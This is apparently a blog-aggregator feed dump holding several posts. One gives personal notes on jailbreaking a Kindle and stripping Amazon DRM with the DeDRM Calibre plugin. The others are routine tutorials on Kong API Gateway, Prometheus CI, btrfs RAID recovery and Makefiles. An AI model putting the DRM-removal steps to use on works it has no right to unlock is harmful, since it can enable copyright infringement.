The current listing is at https:\u002F\u002Fpaste.ubuntu.com\u002Fp\u002FCXS5hYZdqc\u002F with most of it just being koreader.\nkoreader is a FOSS document viewer for E Ink devices that supports Kindle, Kobo, PocketBook, Ubuntu Touch and Android devices.\nThe 2 primary packages are:\nUpdate_KUALBooklet_v2.7_install.bin\nupdate_kpvbooklet_0.6.6_install.bin\nRun ;log mrpi via search after copying them to re-install them if needed.\nkoreader\nDownload the latest release from GitHub.\nYou should download the kindle5-linux-gnueabi package for modern Paperwhites. Unzip it to the copy directory mentioned above.\nAside: koreader has a linux appimage version for desktops, which I package for AUR.\nDRM Related Stuff\nDRM is inherently bad for users. If I switch my Ebook reader from Kindle (which are great as of today) to\na Kobo tomorrow, I want my content to stay with me.\nThere are much better websites that explain the issues with DRM, so go visit: fckdrm.com, DefectiveByDesign.org, or EFF\u002Fdrm.\nThe primary tool for stripping DRM from Kindle books is apprenticeharper’s DeDRM Repo, which works as a Calibre plugin. If you are running calibre with Python 3 (such as via the calibre-python3 package on Arch Linux), you should install the DeDRM plugin from the python3 fork. Compress the DeDRM_plugin directory into a flat zip file and use that in Calibre.\nGetting the Key\nMy current key is saved in pass:\npass show Keys\u002FKindle.k4i | jq\nSave it in a file, which you can import to Calibre.\nIf you don’t have the key or if the above isn’t valid, see this comment on r\u002Febooks [archived].\nImporting the Key\nAt the bottom-left of the plugin’s customization dialog, you will see a button labeled “Import Existing Keyfiles”. Use this button to import existing ‘.k4i’ key files. Key files might come from being exported from this plugin, or may have been generated using the kindlekey.pyw script running under Wine on Linux systems.\nI once did some trickery on the kindlekey.pyw application to get it working on my system, but I didn’t take notes. If I ever do this again - AUTOMATE THIS.\nGetting a copy of the encrypted book\nThere are multiple sources for you to try.\nThe Amazon website’s My Content page is the easiest. It doesn’t work for books with special typesetting - quite rare. Prefer this over everything else.\nDownload via the Kindle for PC application (see next section).\nGet the KFX file from your Kindle device.\nCopy the KFX\u002FAZW file from the Android\u002FiOS application.\nKindle for PC\nStripping DRM for any medium is always a cat-and-mouse game. Amazon keeps changing the DRM format in every Kindle firmware update, which is why the recommended method is to use a known\u002Folder version of the Kindle for Mac\u002FPC Application as your source.\nNote: The 1.24.3 release does not work on Linux. If you’re on Linux, you must download the 1.17.0 release instead (sha256=14e0f0053f1276c0c7c446892dc170344f707fbfe99b6951762c120144163200).\nInstall Kindle for PC. It does work on Wine. Make sure you download 1.24.3 (51068). I trust filehippo for this. The sha256sum for the installer is c7a1a93763d102bca0fed9c16799789ae18c3322b1b3bdfbe8c00422c32f83d7.\nInstall then launch it, and download the book.\nGo to ~\u002FDocuments\u002FMy Kindle Content\nFind the book by Last Modified Date.\nRun calibredb add book.azw. 
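As a rough sketch of those last two steps on the command line (assuming the newest .azw file in the folder is the book you just downloaded):\ncd \"$HOME\u002FDocuments\u002FMy Kindle Content\"\n# Newest file first; the freshly downloaded book should be at the top\nls -t *.azw | head -n 1\n# Importing through calibre lets the DeDRM plugin strip the DRM on the way in\ncalibredb add \"$(ls -t *.azw | head -n 1)\"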
If all goes well, the book should show up in your library, and you should be able to convert it.\nReference Files\nI have a backup of my current Kindle files at http:\u002F\u002Fge.tt\u002F75zk4Dv2 in case you need any of the files mentioned above. Checksums for the files are below, since ge.tt doesn’t believe in HTTPS:\n\ne3b05193ed9d0b482f01dfb550eba67f3b113b5165aae5632379cf35fec2f59d  copy.tar.gz\n14e0f0053f1276c0c7c446892dc170344f707fbfe99b6951762c120144163200  KindleForPC-installer-1.17.44170.exe\nc7a1a93763d102bca0fed9c16799789ae18c3322b1b3bdfbe8c00422c32f83d7  KindleForPC-installer-1.24.51068.exe\n50bb0e5d9c03bcb79b17c1b7063cefd2c947a9d1c4392814e6ec05225296472a  kual-helper-0.5.N.zip\n39352b4b68993680f06d5ecc57ce7ec4c271b6b5f2386ea998027420c45f2acd  KUAL-KDK-1.0.azw2\nceb207ee4c8d3674f308ff91432aeabf213b203571e270f70b8ae218df6ded7d  KUAL-KDK-2.0.azw2\nfce02f0e104e846f1e4cc0e029500c5a722614d63a47035d78ea4cf59f67a448  kual-mrinstaller-1.6.N.zip\n4a6de1fafe47ec0e3bfb529edead401c92e66b00697d507abe945679b3b7bc65  KUAL-v2.7.zip\n253d0b00b31d62ef9dadb7ca88b98e2718cb35246816b3c50dd63c0a7ef28a52  Update_jailbreak_hotfix_1.14_5.8.10_install.bin\ncc63ba1b454d1f32492c835f108ee04aaa80e6e7a95f12b7216c2c015daa2fbc  Update_jailbreak_hotfix_1.14_nomax_install.bin",[],{"slug":2416,"title":2417,"link":2418,"pubDate":2419,"contentSnippet":2420,"tags":2421,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"setting-up-kong-part-2","Setting up Kong API Gateway - Part 2\u002F2","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fsetting-up-kong-part-2\u002F","2019-03-23T06:27:55.000Z","Managing Kong using UI#\nKonga is an unofficial project which is basically an UI for Admin API of Kong. This post is about how to setup Konga and configuring an upstream service. 
We will also add an authentication layer to our upstream.\nDocker to the rescue#\nWe will use Docker to quickly set up Konga: it is a Node.js project, and building Node projects on a server is a lot of trouble, so let’s just use Docker.\nOur docker-compose.yml for reference:\nversion: \"3.1\"\n\nservices:\n  db:\n    image: postgres\n    restart: always\n    ports:\n      - 5432:5432\n    environment:\n      POSTGRES_PASSWORD: \"\u003Credacted>\"\n    volumes:\n      - \u002Fhome\u002Fubuntu\u002Fdocker\u002Fvolumes\u002Fpostgresql\u002F:\u002Fvar\u002Flib\u002Fpostgresql\u002Fdata\n    networks:\n      - dockergalaxy\n\n  app:\n    image: pantsel\u002Fkonga:latest\n    restart: always\n    ports:\n      - 1337:1337\n    environment:\n      DB_URI: \"postgresql:\u002F\u002Fuser_redacted:pass_redacted@db:5432\u002Fdb_redacted\"\n      DB_ADAPTER: \"postgres\"\n    networks:\n      - dockergalaxy\n\n  nginx:\n    image: nginx:latest\n    ports:\n      - 80:80\n      - 443:443\n    volumes:\n      - \u002Fhome\u002Fubuntu\u002Fdocker\u002Fvolumes\u002Fnginx\u002Fconf\u002F:\u002Fetc\u002Fnginx\u002Fconf.d\n      - \u002Fhome\u002Fubuntu\u002Fdocker\u002Fvolumes\u002Fnginx\u002Fssl\u002F:\u002Fetc\u002Fssl\u002Fcerts\u002Fkonga\u002F\n    networks:\n      - dockergalaxy\n\nnetworks:\n  dockergalaxy:\ndocker-compose pull\ndocker-compose up -d\nVerify that all 3 containers are up:\n$ docker ps\nCONTAINER ID        IMAGE                  COMMAND                  CREATED             STATUS              PORTS                                      NAMES\n5f20abcd81fc        nginx:latest           \"nginx -g 'daemon of…\"   29 hours ago        Up 28 hours         0.0.0.0:80->80\u002Ftcp, 0.0.0.0:443->443\u002Ftcp   deployment_nginx_1\nff20abcd24a66        pantsel\u002Fkonga:latest   \"\u002Fapp\u002Fstart.sh\"          30 hours ago        Up 29 hours         0.0.0.0:1337->1337\u002Ftcp                     deployment_app_1\n5848abcd27d2a        postgres               \"docker-entrypoint.s…\"   30 hours ago        Up 29 hours         0.0.0.0:5432->5432\u002Ftcp                     deployment_db_1\n\nKonga is running on port 1337 and you can verify the same by doing a curl:\ncurl http:\u002F\u002Flocalhost:1337 # should return HTTP 200\nAdding an Upstream to Kong#\nVisit the Konga Admin Dashboard to log in. If this is a first-time login, you need to activate the connection to Kong’s Admin API by visiting the Connections tab. This step needs to be done by each admin user, individually.\n\nSome common terminology before we begin setting up our APIs: (Source)\n\nclient: Refers to the downstream client making requests to Kong’s proxy port.\nupstream service: Refers to your own API\u002Fservice sitting behind Kong, to which client requests are forwarded.\nService: Services are abstractions of your own upstream services.\nRoute: Routes are entrypoints into Kong, defining rules for a request to be matched and routed to a given Service.\nPlugin: This refers to Kong “plugins”, which are pieces of business logic that run in the proxying lifecycle. Plugins can be configured for an individual route, for a service, or globally. An example of a plugin we use is the Key Auth plugin for authentication.\n\nAdding New Service#\nVisit the Services section and click on Add new Service. Enter the following details for your upstream service here. 
You can refer to the screenshot below:\n\nName: Add a unique name for your upstream service.\nDescription: Service description.\nTags: List of tags to identify a group of services together. Press ENTER for any kind of array value in the Konga UI.\nURL: Shorthand for setting Host, Path and Protocol with just one value. Note that this is a Konga-only feature; Kong doesn’t have it when using the Admin API calls directly.\n\nVerify the details once and click on Save. Next, we’ll see how to add routes.\nAdding Routes to Services#\nVisit the Services section and click on the service entity you just created.\n\nGo to the routes section and add a new route entry for the service. You can refer to the screenshot below:\n\nName: Add a unique name for your route.\nHosts: Kong checks for the hostname present in the incoming request’s header. If you specify this value then the hostname must be present for Kong to match the request to this route. This is suitable only if you want to block any request made outside this hostname. You can leave it null if not needed.\nPath: List of paths present in the incoming request. This is required to namespace the upstream endpoints. The client must send this prefix in the request; Kong will try to match the request’s path against this list of paths, and based on the setting of strip_path the request will be proxied.\nStrip Path: Boolean value which configures Kong to strip the matching path from the incoming request to the upstream URL.\n\nHow routing actually works#\nKong has the ability to configure really complex routing based on your use cases. For simplicity, and to keep this guide generic, the basic (but most common) use case is discussed below with an example.\nLet’s say your upstream URL (service) is http:\u002F\u002Fjsonplaceholder.typicode.com\u002F. To set up Kong for this service, we will simply add a route with the path \u002Ffake. Here the path acts as a namespace to differentiate between different services. This can be helpful to avoid route collisions if there are a lot of upstream services configured.\nConsider the upstream API endpoint https:\u002F\u002Fjsonplaceholder.typicode.com\u002Ftodos\u002F.\nIf we tell Kong to use the path \u002Ffake and set strip_path to True, then our incoming request should look like\nhttps:\u002F\u002Fkongapigateway.com\u002Ffake\u002Ftodos.\nKong will try to match the path \u002Ffake in this incoming request and look for the routes where the path is \u002Ffake. Since it found the correct route, and we have set strip_path to True, Kong will just remove this particular path prefix while reverse proxying to the upstream URL. This way, our upstream doesn’t need to be concerned about the path prefix either.\nAdding Consumers#\nStep 1:\nVisit the Consumers section to add consumers for your API. Here consumers don’t really mean 1:1 users; a consumer could be a particular production service wanting to consume another service’s API.\nStep 2:\nClick on Add new consumer and enter the following details:\n\nStep 3:\nAdd the remaining details in the groups section. Visit the Credentials section, click on API Keys (since we are using the Key Auth plugin for authentication) and simply click on the Submit button, since Kong will auto-generate the API key for you (which will most likely be more secure than any random key you would enter).\n\n\nStep 4:\nLeave the other details as they are. We will add this consumer to our Services page. 
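If you’d rather script this step than click through Konga, the same consumer and key can also be created against Kong’s Admin API directly. A minimal sketch, assuming the Admin API is reachable on localhost:8001 and using a made-up consumer name:\n# Create a consumer\ncurl -X POST http:\u002F\u002Flocalhost:8001\u002Fconsumers --data \"username=demo-service\"\n# Ask Kong to auto-generate a key-auth credential for it\ncurl -X POST http:\u002F\u002Flocalhost:8001\u002Fconsumers\u002Fdemo-service\u002Fkey-auth\nBack in the UI: 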
Visit the services tab, click on the service entity you created and\ngo to the Plugins section. Click on Add New Plugin and then select Key Auth from the list.\n\nIn the modal that opens up, you need to specify the consumer UUID which was created (or leave it blank to allow access to all consumers). More on controlling access is in the next section.\n\nStep 5:\nThis feels a bit out of the flow, but after checking out the Kong docs, there’s no alternative to this. In the previous step you might have been wondering: what if you need multiple consumers for the service and want to identify them individually? Since Kong requires you to either give the Consumer UUID or leave it blank so all consumers are allowed, the way around this is to use another plugin, the ACL Plugin. With this plugin, you can whitelist a group of consumers, so only the whitelisted consumers can access the API even though you specified All Consumers in the Key Auth plugin. The ACL Plugin must be used in conjunction with another authentication plugin.\nYou can refer to the screenshot below:\n\n\nNOTE: This is the same group which you created at the time of consumer creation. You can group different consumers based on the service they consume, hence the naming convention one can follow is -consumers.\nYou can see all the eligible consumers for the service in the Eligible Consumers tab.\nUsing Kong as an end user#\nYou need to replace your upstream API endpoints and all other custom authentication with just Kong’s URL and the namespace for the service, and add\nthe authentication keys in the header while sending the request.\nFor example:\nIf your original request is:\ncurl -i -X GET --url http:\u002F\u002Fjsonplaceholder.typicode.com\u002Ftodos\u002F\nThe modified request becomes:\ncurl -i -X GET --url https:\u002F\u002Fkongapigateway.com\u002Ffake\u002Ftodos\u002F --header \"X-ACCESS: ENTER_KEY_HERE\"\nAccessing user authentication details in your API#\nYou can remove all custom authentication methods in your API services, as Kong forwards the user information in the headers. You can use the following headers while processing the incoming request to identify the users and implement custom business logic:\n\nX-Consumer-ID: ID of the Consumer on Kong\nX-Consumer-Custom-ID: custom_id of the Consumer (if set)\nX-Consumer-Username: username of the Consumer (if set)\nX-Anonymous-Consumer: will be set to true when authentication failed, and the ‘anonymous’ consumer was set instead.\nX-Credential-Username: the username of the Credential (only if the consumer is not the ‘anonymous’ consumer)\n\nThe End#\nHope you liked the two-part series on setting up and managing your Kong cluster. Do reach out to me @mrkaran_ in case of any feedback for the post. Thanks!",[],{"slug":2423,"title":2424,"link":2425,"pubDate":2426,"contentSnippet":2427,"tags":2428,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"setting-up-kong-part-1","Setting up Kong API Gateway - Part 1\u002F2","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fsetting-up-kong-part-1\u002F","2019-03-23T05:27:55.000Z","Kong#\nKong is an API Gateway, which basically reverse proxies every incoming request to the upstream URL. It is pretty useful if you have a lot of internal services which need to talk to each other (through HTTP) but you don’t want to keep managing the authentication layer, rate limiting, hosts whitelisting and other such things in every service. 
Kong acts as a central entrypoint to all other services’ API endpoints, and all the common heavy lifting is done by Kong’s API layer.\nKong follows a plugin approach, which makes it extensible, and you can even make your own plugins. Using plugins, it is possible to modify the request,\nadd an authentication layer at the Kong level, and forward user meta information headers to the upstream.\nAmongst other API Gateway solutions, Kong is pretty straightforward to get started with and has nice community support as well. All of the actions to configure your API endpoints and manage them can be done through a RESTful Admin API.\nThe following setup guide describes how the infra is set up for High Availability of a cluster of Kong nodes.\nInfra Setup#\nEach individual Kong node is stateless, since it is always connected to an external datastore. In this tutorial, we will provision 2 nodes for Kong. The instances are frontended by Amazon’s ELB, which routes the traffic internally to either Kong node using internal DNS. Kong requires a datastore to fetch the information about upstream APIs, consumers, routing mechanisms and plugins, so each Kong node must be in sync with the other. We will achieve this by using Cassandra as our database for Kong, run in clustering mode. Cassandra uses its gossip mechanism to ensure the other Cassandra node is up to date with any new changes to the data.\nScaling Kong#\nTo scale Kong in the future, we can keep adding Kong nodes horizontally and attaching them to one of the Cassandra nodes. This way we can have multiple Kong nodes in one cluster, each pointing to one central Cassandra datastore.\nSetting up the cluster#\nWe will use Ansible to automate the task of setting up Kong+Cassandra on each of the 2 nodes. You can refer to the playbook which will do the job.\n---\n# https:\u002F\u002Fgithub.com\u002Fmr-karan\u002Fkong-ansible\n# Playbook to install Cassandra and Kong\n\n- hosts: \"{{control_host}}\"\n  remote_user: \"{{control_user}}\"\n  become: yes\n  roles:\n    - role: java\n    - role: cassandra\n    - role: kong\nAfter you run the playbook, there are a couple of important things which need to be configured in order to have an HA setup. This setup guide\nassumes the playbook is run individually on 2 servers: srvr A and srvr B.\nImportant Directory Paths#\n\n\u002Fusr\u002Flocal\u002Fbin\u002Fkong: Kong executable binary\n\u002Fusr\u002Flocal\u002Fkong: All the settings and logs are available under a namespaced directory, referred to as PREFIX in further sections.\n\u002Fetc\u002Fsystemd\u002Fservice\u002Fkong.service: Managing Kong as a systemd service\n\u002Fetc\u002Fsystemd\u002Fservice\u002Fcassandra.service: Managing the Cassandra db as a systemd service\n\u002Fetc\u002Fcassandra\u002Fcassandra.yaml: Config for Cassandra\n\u002Fetc\u002Fkong\u002Fkong.conf: Config for Kong\n\nFirst Steps#\nSetting up Cassandra#\nLet’s set up Cassandra first and run it in clustering mode. 
Do these steps on both of the servers.\nStop any running cassandra node:\nsudo service cassandra stop\n\n\nEdit the cassandra config file and update the following values:\ncluster_name: 'KongAPICluster'\nseed_provider:\n  - class_name: org.apache.cassandra.locator.SimpleSeedProvider\n    parameters:\n      - seeds: \"\u003Cprivate_ip_srvrA>,\u003Cprivate_ip_srvrB>\"\nlisten_address: \u003Cprivate_ip_srvr>\nstart_rpc: true\n\n\nStart cassandra on both the servers and check the status:\nsudo service cassandra start\n\n\nVerify Cassandra clustering:\nsudo nodetool status # Give it a while (30-45 seconds) for both nodes to warm up and discover each other.\nThe output of the above command should look like:\n$ sudo nodetool status\nDatacenter: datacenter1\n=======================\nStatus=Up\u002FDown\n|\u002F State=Normal\u002FLeaving\u002FJoining\u002FMoving\n--  Address        Load       Tokens       Owns (effective)  Host ID   Rack\nUN  \u003CREDACTED>  467.26 KiB  256          100.0%            \u003CREDACTED>  rack1\nUN  \u003CREDACTED>  496.36 KiB  256          100.0%            \u003CREDACTED>  rack1\n\n\nTroubleshooting Cassandra:\ncqlsh unable to connect to the cassandra server:\ncqlsh has a known bug in some versions with Python 2.7 where it cannot connect to the cassandra server. Do the following steps to fix it:\nsudo pip install cassandra-driver\nexport CQLSH_NO_BUNDLED=TRUE\n\n\nUnable to discover the other cassandra node:\nThis usually happens because of network connectivity issues. Verify both nodes are able to talk to each other by running Cassandra in single cluster mode and then issuing the following commands:\n# in srvrA\nnetstat -lntvp | grep cassandra # should be present (port 9042 usually)\n# in srvrB, check similarly...\n# in srvrA\ntelnet private_ip_srvrB 9042 # should connect\n# in srvrB, check similarly...\n\n\n\n\nSetting up Kong#\nLet’s set up each Kong node in the cluster as follows.\nStop any running kong instance:\nsudo service kong stop\n\n\nEdit the kong config file and update the following values:\n...\nadmin_listen = \u003Cprivate_ip_srvrA>:8001, \u003Cprivate_ip_srvrA>:8444 ssl\ndatabase = cassandra\ndb_update_propagation = 10 #seconds\n...\n\n\nStart kong on both the servers and check the status:\nsudo service kong start\n\n\nVerify if Kong is running:\nsudo service kong status\n\n\nRun Kong Migrations:\nRun the migrations on only one node. Since the datastores will be in sync (eventual consistency thanks to Cassandra), we don’t have to run the migrations on the second node.\nkong migrations -c \u002Fetc\u002Fpath\u002Fto\u002Fconfig\n\n\nTroubleshooting Kong:\nCheck if Kong is actually running with sudo service kong status. You can check for logs in $PREFIX\u002Flogs\u002Ferror.log.\nIf Kong is not running, you can try running kong check to verify that the config file is correct. Kong additionally provides a health check command, which can be executed using kong health.\nManaging Kong#\nKong comes with an Admin API to manage all aspects of Kong. 
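For instance, here is a quick sketch of registering an upstream service and a route over the Admin API (assuming it is listening on the address configured above, and using httpbin.org as a stand-in upstream):\n# Register a service\ncurl -i -X POST http:\u002F\u002F\u003Cprivate_ip_srvrA>:8001\u002Fservices --data \"name=example-svc\" --data \"url=http:\u002F\u002Fhttpbin.org\"\n# Attach a route to it\ncurl -i -X POST http:\u002F\u002F\u003Cprivate_ip_srvrA>:8001\u002Fservices\u002Fexample-svc\u002Froutes --data \"paths[]=\u002Fexample\"\n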
There is also an unofficial project which is a UI on top of Kong’s API, and it comes in pretty handy for configuring upstream endpoints, adding plugins, etc.\nTo read more about it, you can continue with the second part of the series here",[],{"slug":2430,"title":2431,"link":2432,"pubDate":2433,"contentSnippet":2434,"tags":2435,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"the-absurdity-of-clubbing-ai-blockchain","The absurdity of clubbing AI with blockchain","https:\u002F\u002Fnadh.in\u002Fblog\u002Fthe-absurdity-of-clubbing-ai-blockchain\u002F","Mon, 18 Mar 2019 00:00:00 +0000","AI is a contentious term whose mainstream interpretation refers to not one particular thing, but to a broad category encompassing a wide variety of concepts, techniques, and technologies—all eventually working towards the common goal of eliciting “intelligent” behaviour in computers.",[],{"slug":2437,"title":2438,"link":2439,"pubDate":2440,"contentSnippet":2441,"tags":2442,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"prometheus-ci","Adding Prometheus configuration to your CI\u002FCD workflow","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fprometheus-ci\u002F","2019-03-17T05:27:55.000Z","Prometheus configurations can turn into a mess in no time if you have a lot of different jobs scraping different targets. Certainly you can use tools like jsonnet to keep your YAML files DRY, but this post is not about that. I initially started off by writing one job to scrape a set of EC2 instances in a particular AWS VPC. Over time, I had a requirement to do it for 3-4 different targets, each of which had its own rules and a different type of exporter as well. The whole practice of SSHing into the server, opening the config file in vim and editing it on the server just didn’t feel right. No surprises for guessing that I f*cked up a few times with config errors (YAML sigh) and finally decided that I needed a better solution for this.\nCI\u002FCD for config files#\n“Wait, so now you’re telling me that I need to set up a full fledged pipeline just for a few config files?”, must have been the thought that echoed in your head. Before you jump to the conclusion that it’s overdoing things, IMHO it’s not. And it’s not that difficult to set up either, so why not? After integrating CI in your workflow, you can be confident that no bad syntax in your PromQL queries, or in the YAML in general, will break your monitoring system.\n“That sounds amazing, show me teh code already”. Our pipeline is fairly simple:\nLint the code using promtool.\nPush to S3.\nWrite a shell script to pull from S3, put the config in the right places and restart the Prometheus systemd service.\n\nYou can automate the last step too, but I just wanted to keep at least one manual check in this system, so I decided against it. 
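Incidentally, the lint and push steps can also be dry-run locally before you ever commit; a minimal sketch, using the same paths as the pipeline below:\n# The same check the CI job runs\npromtool check rules rules\u002Falerts\u002F*\n# Show what the S3 push would change, without uploading anything\naws s3 sync prometheus\u002Frules s3:\u002F\u002Fmybucket\u002Frules\u002F --dryrun\n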
And since I don’t have a distributed Prometheus setup yet, it’s simple to keep things the old school way here.\nYou can do pretty much all of the steps in the above pipeline in any CI of your choice, but I am using Gitlab, so here’s a sample .gitlab-ci.yml file:\nstages:\n  - lint\n  - deploy\n\nprometheus-lint:\n  stage: lint # run this job on stage lint\n  image: golang:1.11-alpine # pull go1.11 image from official docker repo\n  before_script:\n    - apk update && apk add git # install git\n  script:\n    - GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go get -u github.com\u002Fprometheus\u002Fprometheus\u002Fcmd\u002Fpromtool # fetches promtool package\n    - $GOPATH\u002Fbin\u002Fpromtool check rules rules\u002Falerts\u002F* # run the `check rules` command for my prometheus rule files\n\npush-to-s3:\n  stage: deploy # run this job on stage deploy\n  environment:\n    name: production # tag the job metadata in this environment. useful to quickly revert deploys when shit hits the fan\n  image: python:3.7-alpine\n  script:\n    - pip install awscli # adds aws cli tools\n    - aws s3 sync prometheus\u002Frules s3:\u002F\u002Fmybucket\u002Frules\u002F # pushes our rule config files to s3\n  only:\n    refs: # only allow deploy if branch is master.\n      - master\n  when: manual # trigger this job manually\nA brief explanation for the above file:\nstages: Used to define multiple stages in our pipeline; they are executed in order.\njobs: prometheus-lint is one job which will be run in the lint stage. I am using the Docker executor with the Gitlab runner, so the runner agent talks to the Docker executor. The Gitlab-CI file is basically an abstraction that hides these details from the end user: all CI\u002FCD files look pretty much the same, but behind the scenes the way they are executed depends entirely on the executor you choose. Since we are using the Docker executor, the image tag is picked up and that docker image is pulled from a public docker repo for this job.\nbefore_script is basically a hook which is called before we begin running our actual CI stuff. You can add your project dependencies here.\nscript is a list of commands to be executed inside your environment (a container for us).\nNow that we have our basics about the CI\u002FCD pipeline in place, let us see what each of the jobs is actually doing:\nprometheus-lint: Installs the promtool binary and runs it against our rules\u002F folder. The default working directory is our repository itself, so we didn’t have to give the absolute path.\npush-to-s3: Installs the aws cli tools, so we can push the files to s3. In case you are wondering where the access key and secret key are, I have added them as protected variables in my project settings, so only protected branches (e.g. master) can access them.\n\nAutomate everything? Nah mate#\nThis is what the deploy.sh script looks like:\n#!\u002Fbin\u002Fsh\naws s3 sync s3:\u002F\u002Fmybucket\u002Frules\u002F \u002Fetc\u002Fprometheus\u002Fconfig\u002Frules\u002F\npromtool check config \u002Fetc\u002Fprometheus\u002Fprometheus.yml\nsudo service prometheus restart\nAs much as I’d like to be a cool hipster and run \u002Fdeploy from my slack bot (last I checked, there’s a legit term for this: ChatOps), I simply don’t prefer that. Having human intervention before critical deployments like this is OK, IMHO. I don’t update the Prometheus config often, so I don’t mind actually SSH-ing into the single instance and triggering a shell script which does the job for me. 
I also don’t have a distributed Prometheus setup as of yet. Things will definitely change based on your requirements, and there’s no one size that fits all.\nI’m much more confident now with my config changes and don’t have to pray to the server overlords every time I restart Prometheus.\nIt just works.",[],{"slug":2444,"title":2445,"link":2446,"pubDate":2447,"contentSnippet":2448,"tags":2449,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"btrfs-raid-device-replacement-story","Dealing with dead disks in a btrfs RAID1 array","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2019\u002F02\u002F24\u002Fbtrfs-raid-device-replacement-story\u002F","2019-02-24T00:00:00.000Z","tl;dr: Check your disk usage v\u002Fs RAID capacity to ensure that you can remove a disk before trying. If you can connect a new disk without removing the old one, run a btrfs replace - it is much faster.\nMy homeserver has a 4 disk setup:\n128GB Samsung EVO 850 SSD as the primary disk (root volume)\nA 3 Disk btrfs RAID1 Array that I use for almost everything else.\nThe 3 disks were:\nA WD-3.5inch-3TB that I shucked from a WD-MyBook. This was the oldest disk in the array\n2xSeagate 2.5-inch-3TB external disks that I shucked from Seagate Expansion disks.\nThe WD disk had been giving a rising number of errors recently, and I was noticing hangs on the system as well:\nMy Steam saves would take time, and hang the game.\nKodi would occasionally hang just switching between screens as it would load images from disk.\ngitea, which writes a lot to disk, would have similar issues.\nI asked a question on r\u002Farchlinux and confirmed that it was indeed a dead disk.\nOrdered a new Seagate Barracuda 3TB the next day, but my peculiar setup caused me a lot of pain before I could remove the dead disk. The primary issue was the limited number of SATA connectors I had (just 4). The original setup had \u002Fdev\u002Fsdb,\u002Fdev\u002Fsdc,\u002Fdev\u002Fsdd as the three RAID disks, with \u002Fdev\u002Fsdb being the dying WD.\nThis is everything I tried:\nRemoving \u002Fdev\u002Fsdb and adding a new disk to the array (\u002Fdev\u002Fsde). Unfortunately, to add a disk to the array, you have to mount it first, and the setup just refused to mount in degraded mode. (It didn’t give a visible error, so I didn’t know why.)\nI tried to keep the old disk attached over USB on a friend’s suggestion, but that didn’t work either. This was likely a cable issue, and I didn’t investigate this further.\nBooting with the original three disks but replacing the dying disk with the new one post boot. Didn’t work, as I kept getting read\u002Fwrite errors to sdb even after it was disconnected.\nIn short:\nthe system refused to mount the raid array with a missing disk (and I didn’t want to risk a boot with the array unavailable)\nI couldn’t do a live replace because I had a limited number of SATA connectors.\nWhat worked:\nRunning a btrfs device delete and letting it run overnight. It gave an error after quite a long time that finally helped me figure out the problem:\n\nbtrfs device delete \u002Fdev\u002Fsdb1 \u002Fmnt\u002Fxwing\nERROR: error removing device '\u002Fdev\u002Fsdb1': No space left on device\n\nbtrfs fi df \u002Fmnt\u002Fxwing\nData, RAID1: total=2.98TiB, used=2.98TiB\nSystem, RAID1: total=32.00MiB, used=544.00KiB\nMetadata, RAID1: total=5.49GiB, used=4.81GiB\nGlobalReserve, single: total=512.00MiB, used=0.00B\n\n\nThe RAID array was 2.7TBx3 disks and I was storing roughly 2.98TB of data. 
To switch to a RAID1 setup with just 2 disks, I needed to delete some data first: RAID1 keeps two copies of every block, so a pair of 2.7TB disks can hold at most ~2.7TB of data, which is less than the 2.98TiB I was storing. I ended up clearing out a few steam games (bye bye Witcher 3) and ran another btrfs device delete to resolve the issue.\nIf you are faced with a situation where you have to remove a device, but can’t do a live replace, here’s what you need to do:\nCheck that your disk removal does not impact any data storage. Your n-1 disk array should have enough capacity to store everything.\nRun a btrfs device delete\nReboot\nRe-attach the new disk, and then run a btrfs device add\nAs a retro, I posted a summary of the issues I faced on the btrfs mailing list.\nIf you’re interested in my self-hosting setup, I’m using Terraform + Docker, the code is hosted on the same server, and I’ve been writing about my experience and learnings:\nPart 1, Hardware\nPart 2, Terraform\u002FDocker\nPart 3, Learnings\nPart 4, Migrating from Google (and more)\nPart 5, Home Server Networking\nPart 6, btrfs RAID device replacement\nIf you have any comments, reach out to me",[],{"slug":2451,"title":2452,"link":2453,"pubDate":2454,"contentSnippet":2455,"tags":2456,"maintainerName":15,"maintainerUsername":16,"maintainerPhoto":17,"feedUrl":18},"download-ubuntu-19-04-disco-dingo","Download Ubuntu 19.04 Disco Dingo Daily Build ISO","https:\u002F\u002Fibcomputing.com\u002Fdownload-ubuntu-19-04-disco-dingo\u002F","Fri, 02 Nov 2018 19:54:51 +0000","As Canonical started the development of the next version of Ubuntu operating system last week, early testers can now download Ubuntu 19.04 Disco Dingo daily … \nThe post Download Ubuntu 19.04 Disco Dingo Daily Build ISO appeared first on IB Computing.",[12,2457,2458,2459],"Ubuntu","Free Download","Ubuntu Gnome",{"slug":2461,"title":2462,"link":2463,"pubDate":2464,"contentSnippet":2465,"tags":2466,"maintainerName":15,"maintainerUsername":16,"maintainerPhoto":17,"feedUrl":18},"install-wifi-driver-broadcom-bcm43142-linux","How to Install WiFi driver for Broadcom BCM43142 WiFi device in GNU\u002FLinux Distros","https:\u002F\u002Fibcomputing.com\u002Finstall-wifi-driver-broadcom-bcm43142-linux\u002F","Mon, 15 Oct 2018 20:11:35 +0000","Getting proprietary WiFi drivers to work in GNU\u002FLinux distros can be a pain sometimes. This time we’re going to deal with such a proprietary driver … \nThe post How to Install WiFi driver for Broadcom BCM43142 WiFi device in GNU\u002FLinux Distros appeared first on IB Computing.",[12,2200,2467,2468,2469,2470,2457,2471],"Arch Linux","Broadcom","Debian","Fedora","WiFi",{"slug":2473,"title":2474,"link":2475,"pubDate":2476,"contentSnippet":2477,"tags":2478,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"makefiles-intro","Makefile for Golang projects","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fmakefiles-intro\u002F","2018-10-11T12:40:55.000Z","Makefile is an awesome tool to group together a bunch of different rules and automate your build process. Makefiles are used by make, which is essentially a file-generation tool. It is generally used to compile and build programs from source by following the rules listed in the Makefile. People use Makefiles for a lot of different purposes as well, for example converting md to html and publishing these files to a web server.\nEvery makefile you see is composed of rules. A rule is a declaration of a target and the commands to be executed to generate the target. 
